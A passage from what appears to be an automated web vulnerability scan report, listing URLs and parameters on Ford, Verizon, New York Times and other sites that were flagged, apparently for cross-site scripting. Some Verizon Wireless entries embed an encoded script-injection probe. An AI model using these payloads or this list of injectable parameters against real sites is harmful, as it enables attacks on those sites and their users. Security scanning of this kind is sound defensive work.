2.262. http://bp2.forddirect.fordvehicles.com/2011-Ford-SuperDuty/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.263. http://bp2.forddirect.fordvehicles.com/2011-Ford-SuperDuty/ChooseYourPath/ [referringSite parameter]

2.264. http://bp2.forddirect.fordvehicles.com/2011-Ford-Taurus/ChooseYourPath/ [branding parameter]

2.265. http://bp2.forddirect.fordvehicles.com/2011-Ford-Taurus/ChooseYourPath/ [lang parameter]

2.266. http://bp2.forddirect.fordvehicles.com/2011-Ford-Taurus/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.267. http://bp2.forddirect.fordvehicles.com/2011-Ford-Taurus/ChooseYourPath/ [referringSite parameter]

2.268. http://bp2.forddirect.fordvehicles.com/2011-Ford-TransitConnect/ChooseYourPath/ [branding parameter]

2.269. http://bp2.forddirect.fordvehicles.com/2011-Ford-TransitConnect/ChooseYourPath/ [lang parameter]

2.270. http://bp2.forddirect.fordvehicles.com/2011-Ford-TransitConnect/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.271. http://bp2.forddirect.fordvehicles.com/2011-Ford-TransitConnect/ChooseYourPath/ [referringSite parameter]

2.272. http://bucks.blogs.nytimes.com/2010/11/19/requiring-brokers-to-put-their-customers-first/ [src parameter]

2.273. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/download/tour_playerOct09.html [REST URL parameter 5]

2.274. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [Bitrate parameter]

2.275. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [Bitrate parameter]

2.276. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [Channel parameter]

2.277. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [Channel parameter]

2.278. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [ClipId parameter]

2.279. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [ClipId parameter]

2.280. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [Format parameter]

2.281. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [Format parameter]

2.282. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]

2.283. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]

2.284. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]

2.285. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]

2.286. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]

2.287. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]

2.288. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [customRedirect parameter]

2.289. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [helpPagenew parameter]

2.290. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [name of an arbitrarily supplied request parameter]

2.291. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [name of an arbitrarily supplied request parameter]

2.292. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [pageLabel parameter]

2.293. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [portletTitle parameter]

2.294. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [redirectUrl parameter]

2.295. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [refId parameter]

2.296. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [vdoId parameter]

2.297. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog [REST URL parameter 3]

2.298. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog [REST URL parameter 4]

2.299. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog [REST URL parameter 5]

2.300. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_weather [REST URL parameter 3]

2.301. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_weather [REST URL parameter 4]

2.302. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_weather [REST URL parameter 5]

2.303. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews [REST URL parameter 3]

2.304. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews [REST URL parameter 4]

2.305. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews [REST URL parameter 5]

2.306. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_topHeadlines [REST URL parameter 3]

2.307. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_topHeadlines [REST URL parameter 4]

2.308. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_topHeadlines [REST URL parameter 5]

2.309. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/Scottrade_1 [REST URL parameter 3]

2.310. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/Scottrade_1 [REST URL parameter 4]

2.311. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/Scottrade_1 [REST URL parameter 5]

2.312. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2 [REST URL parameter 3]

2.313. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2 [REST URL parameter 4]

2.314. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2 [REST URL parameter 5]

2.315. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_categoryPanel [REST URL parameter 3]

2.316. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_categoryPanel [REST URL parameter 4]

2.317. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_categoryPanel [REST URL parameter 5]

2.318. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_resourceLinks [REST URL parameter 3]

2.319. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_resourceLinks [REST URL parameter 4]

2.320. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_resourceLinks [REST URL parameter 5]

2.321. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_solutionrecommender [REST URL parameter 3]

2.322. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_solutionrecommender [REST URL parameter 4]

2.323. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_solutionrecommender [REST URL parameter 5]

2.324. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonBusinessRewards [REST URL parameter 3]

2.325. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonBusinessRewards [REST URL parameter 4]

2.326. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonBusinessRewards [REST URL parameter 5]

2.327. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonDiscountProgram [REST URL parameter 3]

2.328. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonDiscountProgram [REST URL parameter 4]

2.329. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonDiscountProgram [REST URL parameter 5]

2.330. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10 [REST URL parameter 3]

2.331. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10 [REST URL parameter 4]

2.332. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10 [REST URL parameter 5]

2.333. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11 [REST URL parameter 3]

2.334. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11 [REST URL parameter 4]

2.335. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11 [REST URL parameter 5]

2.336. http://c.brightcove.com/services/messagebroker/amf [2nd AMF string parameter]

2.337. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

2.338. http://cityroom.blogs.nytimes.com/2010/11/19/casting-spells-at-columbus-circle/ [src parameter]

2.339. http://cityroom.blogs.nytimes.com/2010/11/19/driver-of-school-bus-arrested-after-accusations-of-sex-abuse/ [src parameter]

2.340. http://cityroom.blogs.nytimes.com/2010/11/19/the-week-in-pictures-for-nov-19/ [src parameter]

2.341. http://claimid.com/username [REST URL parameter 1]

2.342. http://clicktoverify.truste.com/pvr.php [sealid parameter]

2.343. http://cms.bbb.org/wwwroot/js/global.js [REST URL parameter 1]

2.344. http://cms.bbb.org/wwwroot/js/global.js [REST URL parameter 2]

2.345. http://cms.bbb.org/wwwroot/js/global.js [REST URL parameter 3]

2.346. http://community.thinkfinity.org/community/professionaldevelopment [frame parameter]

2.347. http://content.usatoday.net/dist/custom/gci/InsidePage.aspx [cId parameter]

2.348. http://dealbook.nytimes.com/2010/11/19/as-tech-deals-boom-talk-turns-to-bubbles/ [src parameter]

2.349. http://dealbook.nytimes.com/2010/11/19/in-canada-you-drive-g-m-but-trade-gmm/ [src parameter]

2.350. http://dealbook.nytimes.com/2010/11/19/no-threats-here-financial-firms-tell-u-s/ [src parameter]

2.351. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

2.352. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

2.353. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]

2.354. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]

2.355. http://digg.com/login [REST URL parameter 1]

2.356. http://digg.com/remote-submit [REST URL parameter 1]

2.357. http://digg.com/submit [REST URL parameter 1]

2.358. http://ds.addthis.com/red/psi/p.json [callback parameter]

2.359. http://ds.addthis.com/red/psi/sites/smallbusiness.verizon.com/p.json [callback parameter]

2.360. http://ds.addthis.com/red/psi/sites/thompson.blog.avg.com/p.json [callback parameter]

2.361. https://ebillpay.verizonwireless.com/vzw/accountholder/account/maint-features.do [REST URL parameter 2]

2.362. https://ebillpay.verizonwireless.com/vzw/accountholder/account/maint-features.do [REST URL parameter 3]

2.363. https://ebillpay.verizonwireless.com/vzw/accountholder/account/maint-features.do [REST URL parameter 4]

2.364. https://ebillpay.verizonwireless.com/vzw/accountholder/account/maint-features.do [name of an arbitrarily supplied request parameter]

2.365. https://ebillpay.verizonwireless.com/vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do [REST URL parameter 2]

2.366. https://ebillpay.verizonwireless.com/vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do [REST URL parameter 2]

2.367. https://ebillpay.verizonwireless.com/vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do [REST URL parameter 3]

2.368. https://ebillpay.verizonwireless.com/vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do [REST URL parameter 3]

2.369. https://ebillpay.verizonwireless.com/vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do [REST URL parameter 4]

2.370. https://ebillpay.verizonwireless.com/vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do [REST URL parameter 5]

2.371. http://economix.blogs.nytimes.com/2010/11/19/big-companies-hiring-small-companies-arent-gallup-finds/ [src parameter]

2.372. https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketMainDispatch.do [serviceId parameter]

2.373. https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketMainDispatch.do [serviceType parameter]

2.374. https://espanol.vzw.com/enes/sdmyaccount/clp/login [name of an arbitrarily supplied request parameter]

2.375. http://espn.go.com/espn3/index/_/sport/golf [REST URL parameter 5]

2.376. http://espn.go.com/espn3/index/_/sport/golf [REST URL parameter 5]

2.377. http://fanhouse.com/ [name of an arbitrarily supplied request parameter]

2.378. http://fanhouse.com/ [name of an arbitrarily supplied request parameter]

2.379. http://fantasyfootball.fanhouse.com/ [name of an arbitrarily supplied request parameter]

2.380. http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/ [REST URL parameter 3]

2.381. http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/ [REST URL parameter 3]

2.382. http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/ [name of an arbitrarily supplied request parameter]

2.383. http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/ [name of an arbitrarily supplied request parameter]

2.384. http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/ [synd parameter]

2.385. http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/ [synd parameter]

2.386. http://fifthdown.blogs.nytimes.com/2010/11/19/at-home-jets-look-for-noise-and-hope-to-roar/ [src parameter]

2.387. http://finance.moneyandmarkets.com/roi/x-list.php [ec parameter]

2.388. http://finance.moneyandmarkets.com/roi/x-list.php [sc parameter]

2.389. http://fivethirtyeight.blogs.nytimes.com/2010/11/19/the-800-pound-mama-grizzly-problem/ [src parameter]

2.390. http://gadgetwise.blogs.nytimes.com/2010/11/19/apps-to-amuse-kiddies-for-miles-and-miles/ [src parameter]

2.391. http://gadgetwise.blogs.nytimes.com/2010/11/19/earbuds-with-a-mic-that-sound-about-right/ [src parameter]

2.392. http://gadgetwise.blogs.nytimes.com/2010/11/19/from-bucks-the-more-convenient-gift-card/ [src parameter]

2.393. http://gadgetwise.blogs.nytimes.com/2010/11/19/satellite-radio-without-the-clutter/ [src parameter]

2.394. http://games.verizon.com/do/gameList [search parameter]

2.395. http://games.verizon.com/do/gameList [searchTag parameter]

2.396. http://games.verizon.com/trivia/widget/embed.jsp [gameId parameter]

2.397. http://games.verizon.com/trivia/widget/embed_toolbar.jsp [gameId parameter]

2.398. http://goal.blogs.nytimes.com/2010/11/19/f-c-dallass-ferreira-named-m-l-s-m-v-p/ [src parameter]

2.399. http://green.blogs.nytimes.com/2010/11/19/a-warning-about-climate-change-from-a-departing-republican/ [src parameter]

2.400. http://headlines.verizon.com/headlines/portals/headlines.portal [_article parameter]

2.401. http://headlines.verizon.com/headlines/portals/headlines.portal [_pageLabel parameter]

2.402. http://headlines.verizon.com/headlines/portals/headlines.portal [_photoid parameter]

2.403. http://headlines.verizon.com/headlines/portlets/horoscope/getContent.jsp [horoSign parameter]

2.404. http://ib.adnxs.com/ptj [redir parameter]

2.405. http://img.mediaplex.com/content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html [mpck parameter]

2.406. http://img.mediaplex.com/content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html [mpck parameter]

2.407. http://img.mediaplex.com/content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html [mpvc parameter]

2.408. http://img.mediaplex.com/content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html [mpvc parameter]

2.409. http://img.mediaplex.com/content/0/14302/93015/trust_live_120x600.js [mpck parameter]

2.410. http://img.mediaplex.com/content/0/14302/93015/trust_live_120x600.js [mpvc parameter]

2.411. http://img.mediaplex.com/content/0/14302/93015/trust_live_120x600.js [placementid parameter]

2.412. http://img.mediaplex.com/content/0/711/112902/80234_eBay_Q4_2010_Holiday_NDA_Default_728x90.js [mpck parameter]

2.413. http://img.mediaplex.com/content/0/711/112902/80234_eBay_Q4_2010_Holiday_NDA_Default_728x90.js [mpvc parameter]

2.414. https://login.verizonwireless.com/amserver/UI/Login [goto parameter]

2.415. http://news.aol.com/videos/video-hub/ [REST URL parameter 2]

2.416. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 4]

2.417. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 5]

2.418. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 6]

2.419. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [audio_conf parameter]

2.420. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [bbaw parameter]

2.421. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [connex parameter]

2.422. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [fiostvown parameter]

2.423. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [fiosvoice parameter]

2.424. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [msp parameter]

2.425. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [name of an arbitrarily supplied request parameter]

2.426. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [npa parameter]

2.427. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [nxx parameter]

2.428. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [online_backup parameter]

2.429. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [partner parameter]

2.430. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popcity parameter]

2.431. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popcounty parameter]

2.432. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popdma parameter]

2.433. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popindicator parameter]

2.434. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popip parameter]

2.435. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popservice parameter]

2.436. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popstate parameter]

2.437. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popzipcode parameter]

2.438. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [prizm parameter]

2.439. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [pts parameter]

2.440. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [pws parameter]

2.441. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [search parameter]

2.442. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [sec_email parameter]

2.443. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [smb_enh_msg parameter]

2.444. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [smb_premmail parameter]

2.445. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [usertype parameter]

2.446. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vasonly parameter]

2.447. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vec parameter]

2.448. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vgodfamily parameter]

2.449. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vgodunlim parameter]

2.450. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [viss parameter]

2.451. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vsbb parameter]

2.452. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [webex parameter]

2.453. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [webhosting parameter]

2.454. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [REST URL parameter 4]

2.455. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [REST URL parameter 5]

2.456. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [REST URL parameter 6]

2.457. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [REST URL parameter 6]

2.458. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [audio_conf parameter]

2.459. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [bbaw parameter]

2.460. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [connex parameter]

2.461. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [fiostvown parameter]

2.462. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [fiosvoice parameter]

2.463. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [msp parameter]

2.464. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [name of an arbitrarily supplied request parameter]

2.465. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [npa parameter]

2.466. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [nxx parameter]

2.467. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [online_backup parameter]

2.468. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [partner parameter]

2.469. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popcity parameter]

2.470. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popcounty parameter]

2.471. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popdma parameter]

2.472. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popindicator parameter]

2.473. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popip parameter]

2.474. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popservice parameter]

2.475. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popstate parameter]

2.476. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popzipcode parameter]

2.477. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [prizm parameter]

2.478. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [pts parameter]

2.479. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [pws parameter]

2.480. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [search parameter]

2.481. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [sec_email parameter]

2.482. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [smb_enh_msg parameter]

2.483. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [smb_premmail parameter]

2.484. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [usertype parameter]

2.485. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [vasonly parameter]

2.486. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [vec parameter]

2.487. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [vgodfamily parameter]

2.488. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [vgodunlim parameter]

2.489. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [viss parameter]

2.490. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [vsbb parameter]

2.491. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [webex parameter]

2.492. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [webhosting parameter]

2.493. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [REST URL parameter 4]

2.494. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [REST URL parameter 5]

2.495. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [REST URL parameter 6]

2.496. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [REST URL parameter 6]

2.497. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [audio_conf parameter]

2.498. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [bbaw parameter]

2.499. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [connex parameter]

2.500. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [fiostvown parameter]

2.501. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [fiosvoice parameter]

2.502. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [msp parameter]

2.503. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [name of an arbitrarily supplied request parameter]

2.504. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [npa parameter]

2.505. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [nxx parameter]

2.506. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [online_backup parameter]

2.507. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [partner parameter]

2.508. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popcity parameter]

2.509. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popcounty parameter]

2.510. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popdma parameter]

2.511. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popindicator parameter]

2.512. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popip parameter]

2.513. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popservice parameter]

2.514. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popstate parameter]

